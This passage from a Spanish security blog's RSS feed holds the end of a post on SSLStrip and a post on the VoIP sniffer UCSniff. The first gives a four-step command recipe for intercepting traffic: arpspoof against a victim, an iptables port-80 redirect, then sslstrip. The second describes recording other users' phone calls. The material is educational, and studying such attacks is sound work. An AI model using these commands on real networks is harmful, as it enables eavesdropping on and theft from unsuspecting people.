classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="600" height="345" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="always" /><param
name="src" value="http://www.youtube.com/v/TJHcfs4inhs&amp;color1=0xb1b1b1&amp;color2=0xd0d0d0&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="600" height="345" src="http://www.youtube.com/v/TJHcfs4inhs&amp;color1=0xb1b1b1&amp;color2=0xd0d0d0&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>En resumen, los pasos serian:</p><blockquote><p><strong>1. Configurar IP Forwarding:</strong></p><p>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</p><p><strong>2. Realizando ataque ARP MITM entre las 2 maquinas:</strong></p><p>arpspoof -i eth0 -t VICTIMA HOST</p><p><strong>3. Redireccionar trafico con iptables:</strong></p><p>iptables -t nat -A PREROUTING -p tcp &#8211;destination-port 80 -j REDIRECT &#8211;to-ports 8080</p><p><strong>4. Iniciar SSLStrip en el puerto utilizado</strong></p><p>python sslstrip.py -w archivo</p></blockquote><p>Espero que les sea de utilidad y no olviden comentar <img
src='http://www.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt="icon wink SSLStrip   Espiando tráfico SSL" class='wp-smiley' title="SSLStrip   Espiando tráfico SSL" /></p><p><strong>Mas Información: </strong><br
/> <a
href="http://www.thoughtcrime.org/software/sslstrip/">Pagina Oficial del SSLStrip</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/video-tutoriales-de-metasploit-framework.xhtml" title="Video Tutoriales de Metasploit Framework">Video Tutoriales de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/creando-un-exploit-paso-a-paso.xhtml" title="Creando un Exploit Paso a Paso">Creando un Exploit Paso a Paso</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-de-iptables.xhtml" title="Vídeo Tutorial de IPTables">Vídeo Tutorial de IPTables</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-como-descargar-y-editar-archivos-flash-swf.xhtml" title="Video Tutorial, Cómo descargar y editar archivos Flash (SWF)">Video Tutorial, Cómo descargar y editar archivos Flash (SWF)</a></li><li><a
href="http://www.dragonjar.org/intypedia-enciclopedia-visual-de-la-seguridad-informatica.xhtml" title="IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática">IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática</a></li><li><a
href="http://www.dragonjar.org/como-localizar-usuarios-de-twitter-y-flickr-a-traves-de-sus-fotos.xhtml" title="Cómo localizar usuarios de twitter y flickr a través de sus fotos">Cómo localizar usuarios de twitter y flickr a través de sus fotos</a></li><li><a
href="http://www.dragonjar.org/como-conservar-la-privacidad-en-redes-sociales.xhtml" title="Cómo conservar la privacidad en las redes sociales">Cómo conservar la privacidad en las redes sociales</a></li><li><a
href="http://www.dragonjar.org/the-real-hustle-los-fraudes-al-descubierto.xhtml" title="The Real Hustle &#8211;  Los fraudes al descubierto">The Real Hustle &#8211;  Los fraudes al descubierto</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/sslstrip-espiando-trafico-ssl.xhtml/feed</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>UCSniff &#8211; Sniffer para VoIP</title><link>http://www.dragonjar.org/ucsniff-sniffer-para-voip.xhtml</link> <comments>http://www.dragonjar.org/ucsniff-sniffer-para-voip.xhtml#comments</comments> <pubDate>Wed, 01 Oct 2008 17:49:02 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[General]]></category> <category><![CDATA[Cain]]></category> <category><![CDATA[Espiar]]></category> <category><![CDATA[Grabar Llamadas]]></category> <category><![CDATA[Sniffer]]></category> <category><![CDATA[UCSniff]]></category> <category><![CDATA[VoIP]]></category> <category><![CDATA[Voz Sobre IP]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1294</guid> <description><![CDATA[En el pasado evento Torrcon realizado en  San Diego California del 26 al 28 de Septiembre, Jason Ostrom publico una nueva herramienta llamada  UCSniff. UCSniff es un Sniffer para el protocolo de Voz Sobre ip que permite interceptar llamadas de manera sencilla y casi automática, la herramienta tiene 3 modos de ejecucion: aprendizaje: en este [...]]]></description> <content:encoded><![CDATA[<p>En el pasado evento Torrcon realizado en  San Diego California del 26 al 28 de Septiembre, Jason Ostrom publico una nueva herramienta llamada  <strong><a
href="http://www.dragonjar.org/tag/ucsniff" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con UCSniff">UCSniff</a></strong>.</p><p>UCSniff es un <a
href="http://www.dragonjar.org/tag/sniffer" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Sniffer">Sniffer</a> para el protocolo de <a
href="http://www.dragonjar.org/tag/voz-sobre-ip" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Voz Sobre IP">Voz Sobre ip</a> que permite interceptar llamadas de manera sencilla y casi automática, la herramienta tiene 3 modos de ejecucion:</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img143.imageshack.us/img143/6239/voip1li3.jpg" alt="voip1li3 UCSniff   Sniffer para VoIP"  title="UCSniff   Sniffer para VoIP" /></p><p><strong>aprendizaje:</strong> en este modo se examina todo el tráfico de una red y arma un mapa de ella para poder identificar que IP corresponde al numero telefónico.</p><p><strong>usuario:</strong> en este modo se selecciona un usuario (identificado previamente en el mapeo de la red) y se monitorea todas las llamadas que recibe o realiza.<span
id="more-1294"></span></p><p><strong>conversación</strong>: utilizando esta modalidad de la herramienta podremos seleccionar 2 usuarios y monitorear las conversaciones que estos 2 usuarios realicen.</p><p>En las modalidades de usuario y conversación no solo es posible saber cuando recibe o realiza las llamadas sino que también se pueden almacenar estas en un archivo de audio.</p><p>Ya se había comentado este tema en La Comunidad cuando publicamos los <a
title="Videos y Video Tutoriales relacionados con la Seguridad Informática" rel="bookmark" href="../videos-y-video-tutoriales-relacionados-con-la-seguridad-informatica.xhtml">Vídeos y Vídeo Tutoriales relacionados con la Seguridad Informática</a> entre los que se encontraba el <a
href="http://www.irongeek.com/i.php?page=videos/cainvoip1">vídeo de IronGeek donde se realiza Sniffer sobre Voz IP</a> con el <a
href="http://www.oxid.it/cain.html">Cain &amp; Abel</a>.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://sandiego.toorcon.org/content/section/3/9/#6">Toorcon</a><br
/> <a
href="http://news.cnet.com/8301-1009_3-10052393-83.html?part=rss&amp;subj=news&amp;tag=2547-1_3-0-20">CNet</a>s<br
/> <a
href="http://ucsniff.sourceforge.net/">Sitio Oficial de UCSniffer en Sourceforge</a> (actualmente sin contenido)</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/video-tutorial-sniffing.xhtml" title="Vídeo Tutorial Sniffing">Vídeo Tutorial Sniffing</a></li><li><a
href="http://www.dragonjar.org/como-localizar-usuarios-de-twitter-y-flickr-a-traves-de-sus-fotos.xhtml" title="Cómo localizar usuarios de twitter y flickr a través de sus fotos">Cómo localizar usuarios de twitter y flickr a través de sus fotos</a></li><li><a
href="http://www.dragonjar.org/distribucion-live-cd-analisis-forense.xhtml" title="CAINE &#8211; Distribución Live CD para Análisis Forense">CAINE &#8211; Distribución Live CD para Análisis Forense</a></li><li><a
href="http://www.dragonjar.org/ubicando-a-los-duenos-de-un-iphone-o-ipad.xhtml" title="Ubicando a los dueños de un iPhone o iPad">Ubicando a los dueños de un iPhone o iPad</a></li><li><a
href="http://www.dragonjar.org/analisis-de-trafico-con-wireshark.xhtml" title="Análisis de tráfico con Wireshark">Análisis de tráfico con Wireshark</a></li><li><a
href="http://www.dragonjar.org/re-lanzamiento-3er-reto-forense-comunidad-dragonjar.xhtml" title="Resultados e Informes &#8211; 3er Reto Forense Comunidad DragonJAR">Resultados e Informes &#8211; 3er Reto Forense Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/segundo-reto-forense-de-la-comunidad-dragonjar.xhtml" title="Segundo Reto Forense de La Comunidad DragonJAR">Segundo Reto Forense de La Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml" title="Repositorio con Herramientas de Seguridad">Repositorio con Herramientas de Seguridad</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/ucsniff-sniffer-para-voip.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 16/51 queries in 0.035 seconds using disk: basic
Object Caching 2306/2353 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 22:06:00 -->
